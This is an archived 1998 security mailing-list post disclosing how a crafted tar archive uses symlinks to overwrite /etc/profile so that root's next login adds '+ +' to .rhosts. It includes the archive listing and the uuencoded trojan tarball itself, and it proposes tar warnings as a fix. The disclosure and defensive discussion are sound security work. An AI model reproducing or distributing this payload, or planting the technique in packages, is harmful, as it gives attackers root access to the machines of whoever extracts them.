Hi all ! After reading all these threads about locate, bash ..., I wondered how tar could be abused. Although I didn't find a buffer overflow in a file or directory name (fortunately), it came to me a way to make tar overwrite absolute files on disk, (given the user has access to it), but I can't find how to protect from this because it's based on a perfectly legal behaviour. It's based on the symlinks. Here's an example of a tar file which will overwrite your /etc/profile to make it add "+ +" to root's .rhosts next time he logs in. So if part of its directory architecture is included in any package, a root user could un-tar it to any location without really noticeing that /etc/profile has been rewritten. Of course it would be simpler with only two files, one link to /root and a .rhosts, but that becomes really evident when you consult the file before extracting it. Note that it could also be interesting to write a key to $ANYUSER/.ssh/authorized_keys ! The output of the tar ztvf gives this: $ tar ztvf trojanhorse.tar.gz drwxr-xr-x willy/users 0 Sep 21 11:43 1998 Src/ -rw-r--r-- willy/users 46 Sep 21 11:43 1998 Src/Makefile -rw-r--r-- willy/users 17 Sep 21 11:42 1998 Src/dummy.c lrwxrwxrwx willy/users 0 Sep 21 11:45 1998 src -> Src drwxr-xr-x willy/users 0 Sep 21 11:41 1998 Include/ -rw-r--r-- willy/users 30 Sep 21 11:41 1998 Include/config.h lrwxrwxrwx willy/users 0 Sep 21 11:34 1998 include -> /etc -rw-r--r-- willy/users 758 Sep 21 11:40 1998 include/profile lrwxrwxrwx willy/users 0 Sep 21 11:53 1998 include -> Include The "src" and "Src" directories are just here to make detection less evident. This is the "include" link to /etc which does the work. After processing, it's re-linked to "Include" so when tar ends, no trace is kept of what has been done, except in /etc/profile. The file comes here, uuencoded. PLEASE SAVE YOUR /etc/profile before extracting it to any place (/tmp, for example). I think that if tar gave just a warning each time a file is written after a symlink, and each time a symlink points to /something, this could be good, but perhaps someone would have a better idea. Willy -- +----------------------------------------------------------------------------+ | Willy Tarreau - tarreauat_private - http://www-miaif.lip6.fr/willy/ | | System and Network Engineer at NOVECOM ( France ) - http://www.novecom.fr/ | | Magistere d'Informatique Appliquee de l'Ile de France ( MIAIF ), Year 1997 | +----------------------------------------------------------------------------+ begin 644 trojanhorse.tar.gz M'XL(".$B!C8"`W1R;VIA;FAO<G-E+G1A<@#M6%U/VS`4S6O]*^XR)#10&]MM M$HVI:#S`J`0#+4S[ZB1"XC8>25S9"="7_?;9:4O'-.WCH65:?5YBQS?.]3T^ MOC>)9.(Y*P;T<.C[X```Z?4>7.?``$&`28^$0=#3HYCZ@0.^LP;4JHHE@'/+ M\WSZ2SLFE?/?(=+\G\;7;,1SMJIW$(R#'WA_R+\?+/GW0SU*0L,_MORO'$\A MK8MB"L5\#R`4Y_D>:KUD228,-^X'44,N%(,G+G(L_D/]-SN@DSB/IG]*EOJG MOM%_@+'5_SK@[<P/`"-^V/&LQ#<+2B8K?P>A.`S#/ZG_*";8Z!^'.'2`1FMP M;L/U/RB3O$[92K\!_J;^]W%3_Q%LZ_^U\I^(<L3'G>Q1\G]W6?_[5.\%0GV_ M:_/_FO+_%QT"J`1,Z@KB61V0,6F+@8T`G^G_'\G_)`A\W-3_@:[_J<>JQ.I_ M'?Q[$RE6]@OH-^<_Z0;+\[]'N^;\#[K$GO_K^?]C1+:@'Z&G$$U5Q0JXY2D# M5MYP*<J"E3HUE"F86%7U!+3Y6,:%TN9'=9E47)2J,8AS'BNF8"R`E[.IKV*5 MR02A\X.+X[Z[92Y[7JVD]YZ0-X%WQ4L7G4>D[WX:UB^'&0S??1X.M\!%J,YY MP2MH)_J#H`'B(_@$ESR%]KB\A/ZL6>MF.YZW=7-<Z>T%GU]`E;$2M>HB5M>` M,44L5^R^3RD:<83>1H=O^HMIT,G9J]<'IX?]+7,;G1X,3OJN=Q-+3TV$R+TB MYKG7C&GOCL^BB\;XTJS!RX2JRKA@E^AX$%U$@X^'?>-UTSL:G!PN[["[B9`5 MF$"`7C@L)H+%@_#],V!>!W/'P+B$T$A(X/<!GG/72;V=CLK@!:0"M9I(M>]@ MBR\CT>KH+FKI9:>B9+-@-JO1D91"5/>66I3-[S]W%W9=V-^'KV;8ZTBS2&6& MDPFTT]'Dat_private;2=AF+=6CI\Q_'8/_AOM.FLH#VZ&=SS%PY$>(:X@JF MHI8P]P3VVL]<,*Q`6\'V!U%OWS"X8JR$+$ZN60I74UW2&(&;R;:;51K:;=[_ J-_,_)9B:[S_:P[K^IX,U.+?AY[^%A86%A86%A86%Q>;@&SKXX[<`*``` ` end
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:17:25 PDT